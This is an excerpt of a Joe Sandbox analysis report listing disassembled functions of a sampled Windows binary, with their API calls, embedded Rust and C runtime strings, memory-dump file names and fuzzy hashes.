Instruction Fuzzy Hash: 5C015262B1868586F750DFA6D6013AD66A0AB44B90F148031EF5CC3BC5EF7CE991E311

Function 00007FF63D277E60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF63D277F14

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs, xrefs: 00007FF63D27802E
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF63D278046

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs
API String ID: 1452528299-513854611
Opcode ID: aed944820c4ff97ba46419a47c76fa312d113af2be5a85ce08e8b0606597aa19
Instruction ID: 2f49c05b8e9662939443fe256b277e743ef3fa4636321a5daeb29e92f5892eef
Opcode Fuzzy Hash: aed944820c4ff97ba46419a47c76fa312d113af2be5a85ce08e8b0606597aa19
Instruction Fuzzy Hash: 2651CC72E045918AF7749FA5E5412BDB3B0FF44354F20812AEF9983B95EE3CA581D740

Function 00007FF63D285B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000000,?,00007FF63D271DCA), ref: 00007FF63D285BBE
TlsSetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF63D271DCA), ref: 00007FF63D285C19

Strings

assertion failed: is_unlocked(state), xrefs: 00007FF63D285BE6

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: AddressSingleValueWake
String ID: assertion failed: is_unlocked(state)
API String ID: 741412973-3502192491
Opcode ID: da2c4ba34aa77a352e36bf536d0e6d29029739b6ea50faa7ea929ed43c8ffefd
Instruction ID: 1105275f1056e65b439f53ed8e9a1669814d842c7828b60b40543dde07b4beb3
Opcode Fuzzy Hash: da2c4ba34aa77a352e36bf536d0e6d29029739b6ea50faa7ea929ed43c8ffefd
Instruction Fuzzy Hash: 6F21D822F0A41E4EFB665A9556003B96291DF94B59F64C034DF0D873D9FE3DAC83A780

Function 00007FF63D281740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,00007FF63D26D9B8,?,?,?,?,?,?,00007FF63D257A96), ref: 00007FF63D281765
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF63D26D9B8,?,?,?,?,?,?,00007FF63D257A96), ref: 00007FF63D281800

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D28181D

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorFrequencyLastPerformanceQuery
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 3362413890-2333694755
Opcode ID: 125f12cbf819ad59ff386bc5975b7acf701ca1fb5fc1d74b55788fa64a06a3e6
Instruction ID: fedb590e3647abfc5e5a789400b1eb9b03aee24508f233303b9eee7ea811ff27
Opcode Fuzzy Hash: 125f12cbf819ad59ff386bc5975b7acf701ca1fb5fc1d74b55788fa64a06a3e6
Instruction Fuzzy Hash: B831E211F08B8E46FB08DBE699112F967969F95B80F048036DE0E87795FE3CA905E340

Function 00007FF63D26D990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,00007FF63D257A96), ref: 00007FF63D26D9A6
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF63D257A96), ref: 00007FF63D26D9C0

Part of subcall function 00007FF63D281740: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,00007FF63D26D9B8,?,?,?,?,?,?,00007FF63D257A96), ref: 00007FF63D281765

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D26D9DD

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: PerformanceQuery$CounterErrorFrequencyLast
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 158728112-2333694755
Opcode ID: 5bc127802c3df2079730c422be3828e83479d8627c7c24287756ef6ca370a142
Instruction ID: 7a9d7a72ea6869cf6f7a750804c6738f0e9bd52fa8d70aa9fd72912492b00f8a
Opcode Fuzzy Hash: 5bc127802c3df2079730c422be3828e83479d8627c7c24287756ef6ca370a142
Instruction Fuzzy Hash: 4411A522E0CA8A99EB10ABB0D5423FD2720EF84348F444032EE4D83796FE7CE655E340

Function 00007FF63D277C60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF63D277CC0

Part of subcall function 00007FF63D267C60: memset.MSVCRT ref: 00007FF63D267C84
Part of subcall function 00007FF63D267C60: WSASocketW.WS2_32 ref: 00007FF63D267CC5

Strings

assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketlibrary\std\src\os\windows\io\socket.rs, xrefs: 00007FF63D277C87

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Socketmemsetrecv
String ID: assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketlibrary\std\src\os\windows\io\socket.rs
API String ID: 1952720251-42570012
Opcode ID: 18c7bb4dfbb0b872742dc44238251bf92bb93ec967aacfa1f0eec4458d7dcfab
Instruction ID: 60535a709671c2543cccdfde1436283f42fd43253cfc16d63d03a7b2d8056374
Opcode Fuzzy Hash: 18c7bb4dfbb0b872742dc44238251bf92bb93ec967aacfa1f0eec4458d7dcfab
Instruction Fuzzy Hash: BB012422F18E8EA9FB3452F5E4452B813519B89734F644335EA3DC77D5FE2CEA829210

Function 00007FF63D2CD690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

Unknown error, xrefs: 00007FF63D2CD77C
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 325970b99f59e992869b15b547b78a0270b7646e7ed450ca3ae991192f7a869d
Instruction ID: f602968d102001f24ef13ea3bea9d7bdc5e45feb1aed64c011e49ae9d515bc2a
Opcode Fuzzy Hash: 325970b99f59e992869b15b547b78a0270b7646e7ed450ca3ae991192f7a869d
Instruction Fuzzy Hash: 79018A63D0CF8882E6018F58D9001BA7330FB5E789F155325EB8C56655EF38E992D700

Function 00007FF63D2CD730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

Argument domain error (DOMAIN), xrefs: 00007FF63D2CD730
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 6eb4b77c4f8eaeccad83fc189a02852e575d745d1ffcaaaa937404e0f1d88fc3
Instruction ID: 3b12314f60bc26fbb0d49f190c6adc42182b8deaf9fef60fbb0f58c525c22076
Opcode Fuzzy Hash: 6eb4b77c4f8eaeccad83fc189a02852e575d745d1ffcaaaa937404e0f1d88fc3
Instruction Fuzzy Hash: EEF06253C08E8882E2128F6CA4001BB7330FF8E788F245335EF8D66655EF28E9829700

Function 00007FF63D2CD770 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7
Total loss of significance (TLOSS), xrefs: 00007FF63D2CD770

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 03791ac738d86c5becd05f1d06faabf352435464b988844d8f4eb4cb428f2bb6
Instruction ID: fc82a0010b1f6ec4f35c85290a7a84e6151ec7f6ab01d7c1b634d3a7fd4a670f
Opcode Fuzzy Hash: 03791ac738d86c5becd05f1d06faabf352435464b988844d8f4eb4cb428f2bb6
Instruction Fuzzy Hash: D6F06853C08E4881D2128F5CA4001BB7330FF8E788F155335DF8D66655EF28E9829700

Function 00007FF63D2CD760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF63D2CD760
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 74f6f8cb7482b7fac668cf4040dadbe3c3bfaaa47e60ece2ce6dc68220263ba8
Instruction ID: 0b2fab499377ab81c81ded808b8d19c3db0c226606326541d20aa1149ce58a79
Opcode Fuzzy Hash: 74f6f8cb7482b7fac668cf4040dadbe3c3bfaaa47e60ece2ce6dc68220263ba8
Instruction Fuzzy Hash: BCF06253C08E8882E2128F6CA4001BB7330FF8E788F245335EF8D66655EF28E9829700

Function 00007FF63D2CD750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF63D2CD750
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3cb0424a8953d48a008c56219b0bef7cf853752c9e33e66b8e5c155e833ea758
Instruction ID: 809fbcd82e80c08a4cd8396553fcca04ab87b7d5dc402cae12c0c2ceef48da42
Opcode Fuzzy Hash: 3cb0424a8953d48a008c56219b0bef7cf853752c9e33e66b8e5c155e833ea758
Instruction Fuzzy Hash: A2F06253C08E8C82E2128F6CA4001BB7330FF8E788F245335EF8D66655EF28E9829700

Function 00007FF63D2CD740 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF63D2CD740
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: c2ec67f7798fbaf6a926c8f2ca5cc0b96a5e3d9249152667c1d4eac8be866468
Instruction ID: 7d4924642c647cef017a4ca5c711de6ea5251f607c342fd2a9fce3ddd8c46136
Opcode Fuzzy Hash: c2ec67f7798fbaf6a926c8f2ca5cc0b96a5e3d9249152667c1d4eac8be866468
Instruction Fuzzy Hash: C8F06253C08E8882E2128F6CA4001BB7330FF9E798F255335EF8D66655EF28E9829700

Function 00007FF63D2CD6C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF63D2CD710

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF63D2CD6F7
Argument singularity (SIGN), xrefs: 00007FF63D2CD6C8

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 044f746fec8141a5650da142353fa8f6c9191853f4d67955629525536e3646b3
Instruction ID: 72d920772baec6e8d04daa5489389cfa69373eafbc287b2695d449c965fc3ccc
Opcode Fuzzy Hash: 044f746fec8141a5650da142353fa8f6c9191853f4d67955629525536e3646b3
Instruction Fuzzy Hash: E6F03653D18E8882D2129F6CA4001AB7330FF5E799F155325EF8D6A655EF28E9829700

Function 00007FF63D28C120 Relevance: 5.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C142
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C1A3
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C1B3
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C202

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a05e09182db94a876affe21de00ebe067f77ea428299a94fd0279bedaa08db00
Instruction ID: 2af2465c8b512d088927e73ee2fa5b5ffc67c1678eb814f0fd45a85c2613a6d5
Opcode Fuzzy Hash: a05e09182db94a876affe21de00ebe067f77ea428299a94fd0279bedaa08db00
Instruction Fuzzy Hash: 1931AD22F0D65A41FA556B918B403B952E1AF88B81F488035EF4DC7BDAFF6CE801B340

Function 00007FF63D28C030 Relevance: 5.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C052
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C076
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C0CC
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF63D271E04), ref: 00007FF63D28C0D9

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1ddc5afa2437382de4da30d14379927b5c5762f07e08f54a2fa18bdb4944adac
Instruction ID: f6cd13d08fe9a78ae34dd8c390d3b581754926bbe4ab4a13fc71f3bd4fbc1f71
Opcode Fuzzy Hash: 1ddc5afa2437382de4da30d14379927b5c5762f07e08f54a2fa18bdb4944adac
Instruction Fuzzy Hash: 3821BA21E0D2DA46FA516AA58B1037959E1AF45BD0F088034EF4DA7BC6FE3CE842B300

Function 00007FF63D233D0F Relevance: 5.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D233D47
memset.MSVCRT ref: 00007FF63D233D57
memcpy.MSVCRT ref: 00007FF63D233D71
memset.MSVCRT ref: 00007FF63D233D8F

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 3a4eb231362921433dc93685f34cfa11d0ceaa83893d8fe4e9e3e3f5a0c8f505
Instruction ID: 0401db03dfc98be4067733e3f3c8d347d1345ed70d9ef11e5dabebfff5e4b857
Opcode Fuzzy Hash: 3a4eb231362921433dc93685f34cfa11d0ceaa83893d8fe4e9e3e3f5a0c8f505
Instruction Fuzzy Hash: 7B012202F1478106F328D272E201BEBA502AB97784F048130DB89477C3EF6DF6859712

Function 00007FF63D237DD0 Relevance: 5.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D237DE7
CloseHandle.KERNEL32 ref: 00007FF63D237DEF
CloseHandle.KERNEL32 ref: 00007FF63D237DFE
CloseHandle.KERNEL32 ref: 00007FF63D237E0E

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle
